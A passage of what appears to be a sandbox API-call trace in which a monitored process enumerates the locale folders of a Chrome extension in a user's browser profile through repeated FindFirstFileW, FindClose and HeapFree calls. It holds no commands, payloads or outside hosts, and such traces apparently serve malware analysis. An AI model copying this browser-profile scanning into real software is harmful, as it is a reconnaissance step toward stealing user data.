lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0149.089] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\*", lpFindFileData=0x2b4dfd0 | out: lpFindFileData=0x2b4dfd0) returned 0xa32ce8 [0149.126] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\*", lpFindFileData=0x2b4dd4c | out: lpFindFileData=0x2b4dd4c) returned 0xa32d28 [0149.185] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\*", lpFindFileData=0x2b4dac8 | out: lpFindFileData=0x2b4dac8) returned 0xa32968 [0149.187] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32de8 [0149.188] FindClose (in: hFindFile=0xa32de8 | out: hFindFile=0xa32de8) returned 1 [0149.188] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0149.188] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32de8 [0149.188] FindClose (in: hFindFile=0xa32de8 | out: hFindFile=0xa32de8) returned 1 [0149.189] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0149.189] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32de8 [0149.189] FindClose (in: hFindFile=0xa32de8 | out: hFindFile=0xa32de8) returned 1 [0149.189] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0149.190] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32de8 [0149.190] FindClose (in: hFindFile=0xa32de8 | out: hFindFile=0xa32de8) returned 1 [0149.190] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0149.190] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32de8 [0149.191] FindClose (in: hFindFile=0xa32de8 | out: hFindFile=0xa32de8) returned 1 [0149.191] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0149.191] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32de8 [0149.191] FindClose (in: hFindFile=0xa32de8 | out: hFindFile=0xa32de8) returned 1 [0149.191] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0149.191] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32de8 [0149.192] FindClose (in: hFindFile=0xa32de8 | out: hFindFile=0xa32de8) returned 1 [0149.192] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0149.192] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32de8 [0149.192] FindClose (in: hFindFile=0xa32de8 | out: hFindFile=0xa32de8) returned 1 [0149.194] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0149.194] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32de8 [0149.195] FindClose (in: hFindFile=0xa32de8 | out: hFindFile=0xa32de8) returned 1 [0149.195] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0149.195] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32de8 [0149.195] FindClose (in: hFindFile=0xa32de8 | out: hFindFile=0xa32de8) returned 1 [0149.196] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0149.196] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32de8 [0149.196] FindClose (in: hFindFile=0xa32de8 | out: hFindFile=0xa32de8) returned 1 [0149.196] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0149.196] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32de8 [0149.197] FindClose (in: hFindFile=0xa32de8 | out: hFindFile=0xa32de8) returned 1 [0149.197] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0149.197] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32de8 [0149.197] FindClose (in: hFindFile=0xa32de8 | out: hFindFile=0xa32de8) returned 1 [0149.198] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0149.198] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32de8 [0149.198] FindClose (in: hFindFile=0xa32de8 | out: hFindFile=0xa32de8) returned 1 [0149.198] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0149.198] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32de8 [0149.199] FindClose (in: hFindFile=0xa32de8 | out: hFindFile=0xa32de8) returned 1 [0149.199] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0149.199] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32de8 [0149.202] FindClose (in: hFindFile=0xa32de8 | out: hFindFile=0xa32de8) returned 1 [0149.203] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0149.203] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32de8 [0149.203] FindClose (in: hFindFile=0xa32de8 | out: hFindFile=0xa32de8) returned 1 [0149.204] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0149.204] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32de8 [0149.204] FindClose (in: hFindFile=0xa32de8 | out: hFindFile=0xa32de8) returned 1 [0149.204] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0149.204] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32de8 [0149.290] FindClose (in: hFindFile=0xa32de8 | out: hFindFile=0xa32de8) returned 1 [0149.290] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0149.290] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32de8 [0149.290] FindClose (in: hFindFile=0xa32de8 | out: hFindFile=0xa32de8) returned 1 [0149.290] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0149.291] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0149.670] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0149.670] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0149.670] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d68 [0149.795] FindClose (in: hFindFile=0xa32d68 | out: hFindFile=0xa32d68) returned 1 [0149.795] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0149.795] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d68 [0149.795] FindClose (in: hFindFile=0xa32d68 | out: hFindFile=0xa32d68) returned 1 [0149.795] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0149.795] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0149.915] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0149.915] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0149.915] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0149.915] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0149.916] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0149.916] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0149.919] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0149.919] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0149.919] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0149.920] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0149.920] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0149.920] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0149.921] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0149.921] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0149.921] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0149.922] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0149.922] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0149.922] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0149.923] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0149.923] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0149.923] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0149.923] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0149.923] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0149.923] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0149.924] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0149.924] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0149.924] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0149.924] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0149.925] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0149.925] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0149.925] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0149.925] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0149.925] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0149.926] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0149.926] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0149.926] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0149.927] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0149.927] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0149.927] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0149.927] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0149.927] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0149.927] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0149.928] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0149.928] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0149.929] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0149.929] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0149.929] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0149.929] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0149.930] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0149.930] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0149.930] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0149.930] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0149.930] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0149.930] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0149.931] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0149.931] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0149.931] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0149.931] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0149.931] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0149.931] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0149.932] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0149.932] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0149.932] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0149.933] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0149.933] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0149.933] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0149.933] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0149.934] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0149.934] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0149.934] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0149.934] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0149.934] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0149.935] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0149.935] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0149.935] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 